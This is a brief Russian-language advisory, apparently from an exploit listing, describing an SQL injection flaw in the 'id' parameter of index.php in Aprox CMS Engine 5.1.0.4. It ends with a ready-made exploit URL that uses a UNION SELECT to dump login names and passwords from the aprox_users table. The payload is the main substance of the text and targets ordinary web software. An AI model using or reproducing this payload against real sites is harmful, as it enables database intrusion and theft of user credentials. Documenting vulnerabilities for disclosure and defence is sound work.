Программа: Aprox CMS Engine 5.1.0.4
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
www.Target.com/index.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,
0,0,'MrSQL',0,password,login,0,0,0+FROM+aprox_users/*
